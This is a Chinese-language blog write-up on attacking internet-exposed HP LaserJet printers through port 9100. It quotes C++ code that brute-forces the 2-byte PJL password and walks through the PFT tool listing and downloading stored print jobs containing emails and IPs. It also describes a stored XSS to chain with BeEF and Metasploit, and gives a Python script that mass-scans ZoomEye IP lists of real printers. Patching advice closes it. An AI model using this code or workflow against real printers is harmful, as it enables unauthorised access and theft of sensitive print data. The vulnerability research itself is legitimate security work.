0x01 漏洞概要
PCL代表打印机控制语言(Printer Control Language),由惠普公司开发,并被广泛使用的一种打印机协议。关于另一种页面描述语言,应该提一提由Adobe设计的PostScript(PS),它可以将更为复杂的事情交由绘图仪/打印机处理。PJL (Printer Job Language,打印机作业语言)作为PCL的扩展,用于指导打印机行为,比如更改设备设置、传输文件等。 若打印机的9100端口向公网开启,在向打印机发送PJL指令之前需要对使用者的身份进行认证,认证程序的密钥长度为2字节(Byte),因此可以通过暴力破解认证密钥想打印机发送PJL指令,最终导致任意命令的执行。
PJL (Printer Job Language)程序用于告诉打印机执行什么动作,是对PCL的额外支持。 PJL (Printer Job Language) 用于规范格式化页面的基本语言。本身是无害的,但却成为大多数解析器和解释器的漏洞利用代码。
0x02 漏洞原理
打印机系统9100端口开启时,若连上该端口通过PJL指令发送设备名称请求并得到打印机的响应,说明可以未授权访问打印机,PJL保护机制的密钥由2个字节(16比特)的存储单位存储,可以进行暴力破解攻击,从而得到目标打印机的完全访问权限。
根据国外安全研究员PHENOELIT 已经写好了漏洞利用程序,对其中的主要代码进行分析,得到下面的流程图
下面是破解密钥部分的代码:
- 在pjlsession.cpp中的230到256行
void PJLsession::blind_disable_pjl_password(unsigned int pass) {
String ts;
char numb[50];
if ((pass==0)||(pass>65535)) throw ExInvalid();#ifndef UNIX
_snprintf(numb,49,"%u",pass);#else
snprintf(numb,49,"%u",pass);#endif //UNIX
connection.clear();
connection.sendbuf.set(PJL_START);
connection.sendbuf.append("\r\n");
connection.sendbuf.append("@PJL JOB PASSWORD=");
connection.sendbuf.append(numb);
connection.sendbuf.append("\r\n@PJL DEFAULT PASSWORD=0 \r\n");
connection.sendbuf.append("@PJL EOJ\r\n");
connection.sendbuf.append(PJL_FINISH);
connection.senddata();
// TEST !!!
// connection.recvatleast(9,ctimeout);
// end TEST
connection.sendbuf.clear();
}因为打印机所使用的密码长度只有2个字节,即16个bit, 65535中表示方法,所以密码范围在0到65535之间,这就是为什么程序能暴力破解打印机认证密码。
connection.sendbuf.set()后面根据PJL协议发送指定的数据包。使攻击者在破解密码之后可以用里面的命令进行任意操作了。
0x03 案例分析
首先获取可能存在漏洞的打印机IP地址,打开www.zoomeye.org,输入漏洞关键字 HP LaserJet 进行搜索。搜索结果如下:
从结果中可以看到一些带有 HP LaserJet 标签的互联网主机和所属国家信息,这些主机就很有可能隐藏着打印机漏洞。我们从中选取一些进行测试。
Nmap端口扫描
Nmap的扫描结果显示主机不但开启了9100端口,80,443,23端口也开着,入侵也就多了一些其他的方式。
我们使用 PHENOELIT 开发的PFT工具来进行渗透测试。这个用C++写成的黑客工具有简单的命令行交互界面,专门用来破解PLJ接口的打印机,获取打印机的环境变量、文件系统和重要目标文件。
PFT密码破解
我们运行PFT工具,用 help 命令查看帮助文档
可以用PFT提供的暴力破解功能清除掉打印机的 PJL 程序保护。
显示密码清除成功,使用 ls 命令查看打印机上硬盘里的文件:
在这里可以查看打印机硬盘中存放的所有东西。如果打印机缓存了打印文件,在这里也是可以找到的。我们可以进入一个目录选择一个文件下载到本地:
查看L006105.XML文件的内容:
在这里可以查看到一些诸如本次打印的任务主机IP,邮箱,打印的文件名等敏感信息。
XSS攻击
存在于惠普打印机中风险的仅仅是拒绝服务,信息泄漏这么简单吗?在 Exploit-DB网站 中找到 HPLaserJet printers - Multiple Stored XSS Vulnerabilities(点击连接) 惠普打印机的多个存储型 XSS 漏洞, 对应 CVE 号: CVE-2012-3272 没给出利用方式,试着打开浏览器Fuzz了出来: 点击WEB的“支持信息”连接
点击 Apply 按钮,出现了 XSS 弹框:
利用该漏洞,配合 Beef 攻击框架,通过一段编写好的 JavaScript(hook.js)控制目标主机的浏览器,通过目标主机浏览器获得该主机的详细信息,并进一步扫描内网,配合 Metasploit 绝对是内网渗透一大杀器。
0x04 全球漏洞分布
自动测试脚本
HP打印机的厂商已经对固件进行了升级,采用更安全的加密机制处理PJL密钥,不过由于全球范围用户基数比较大,已经用户安全意识不强,依然大量存在这种受害打印机,由ZoomEye网络空间搜索引擎导出的数据接合我们小组写的自动化扫描脚本。
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import socket
import json
import sys
from optparse import OptionParser
PJL_START = "\033%-12345X@PJL "
PJL_FINISH = "\033%-12345X\r\n"
PJL_USTATUS = "USTATUS DEVICE="
PJL_INFO_ID = "INFO ID\r\n"
EOF = PJL_START + PJL_USTATUS + "OFF\r\n" + PJL_FINISH #PJL 语言
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH #PJL 语言 获取设备型号
class Printer():
def __init__(self):
self.usage()
if sys.argv < 1 :
self.usage()
self.readfile(options.file)
def usage(self):
parser = OptionParser()
parser.add_option("-i", "--ip", dest="ip",
help="test single ip") #
parser.add_option("-f", "--file",dest="file",
help="files ") #
global options
(options, args) = parser.parse_args()
def Buildsocket(self, ip, port=9100):
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM,0) #与主机建立socket连接
sock.settimeout(5)
try:
sock.connect((ip, port))
except:
print "[!*]-ip-%s-can't connect--" % ip
return 'error'
sock.send(EOF)
sock.send(DEVICEID) # 发送PJL指令给远程打印机
try:
device = sock.recv(1024)
except:
return 'No'
print "[!*]-ip-%s-is-ok\r\ndeviceidis-%s" % (str(ip), device)
sock.close()
return 'OK'
def GetDiviceMap(self, data,status):
f = open('result.txt', 'a+')
try:
f.write(str(data['ip']) + ', ' + status + ', ' + str(data['geoinfo']['country']['name']['en'])
+', '+ str(data['geoinfo']['city']['en']) + ', ' + str(data['geoinfo']['location']['longitude'])
+', '+ str(data['geoinfo']['location']['latitude']) + ', ' + str(data['geoinfo']['country']['code'])
+', ' + str(data['geoinfo']['continent']['name']['en']) + "\r\n")
except:
pass
f.close()
def readfile(self, file):
Vuln_ip = 0 # ip 列表输入的IP数量
No_vuln_ip = 0
CantConnectIP = 0
linenum = 0
f = open(file, 'r')
for line in f.readlines():
data = json.loads(line)
status = self.Buildsocket(data['ip'])
if status == 'error':
CantConnectIP += 1
elif status == 'No':
No_vuln_ip += 1
else:
Vuln_ip += 1
self.GetDiviceMap(data, status)
linenum += 1
print "[!*]-Now-is-%s-lines" % str(linenum)
f.close()
print str(CantConnectIP) + " " + str(No_vuln_ip) + " " + str(Vuln_ip)
if __name__ == '__main__':
Printer()
全球影响面
这个漏洞波及了很多国家和地区,以美国最盛。我们用小组开发的自动化脚本加上ZoomEye提供的1万组惠普打印机IP进行测试。 结果绘制成图表如下。
- 全球可入侵IP分布
- 全球已修复IP分布
可以看到,美国是 PCL 打印机漏洞的重灾区,至今还拥有数量最多的漏洞主机。韩国也受到了很大的影响。其他国家,包括中国,有漏洞的打印机数量都不多,而且一半以上已被修复。
0x05 修补建议
对打印机管理员有以下建议:
- 不使用的服务,如 FTP ,TELNET 服务,应手动关闭。
- 直接关闭 9100 端口,不允许外网访问。
- 不要使用公网 IP 作为打印机地址。
- 关注产品动态,保证及时更新。
0x06 结论
像打印机,摄像头这种联网类型的设备,目前大家对这方面的安全意识需要进一步加强,最好把设备控制在内网使用。如果需要提供到外网接口,一定要采取一定的安全措施,默认的安全口令也需要修改。增加攻击人员的成本从而使得设备更加安全。
本文由 我和另外两个小伙伴 fengxuan zhufengdaaa 完成
原文首发于:http://zhufengdaaa.github.io
参考网址:
https://www.altamiracorp.com/blog/employee-posts/hacking-hp-printers-for-fun-profit
https://en.wikipedia.org/wiki/Printer_Job_Language
http://www.51cto.com/art/200508/7989.htm
https://www.exploit-db.com/exploits/10011/
http://www.freebuf.com/articles/system/7115.html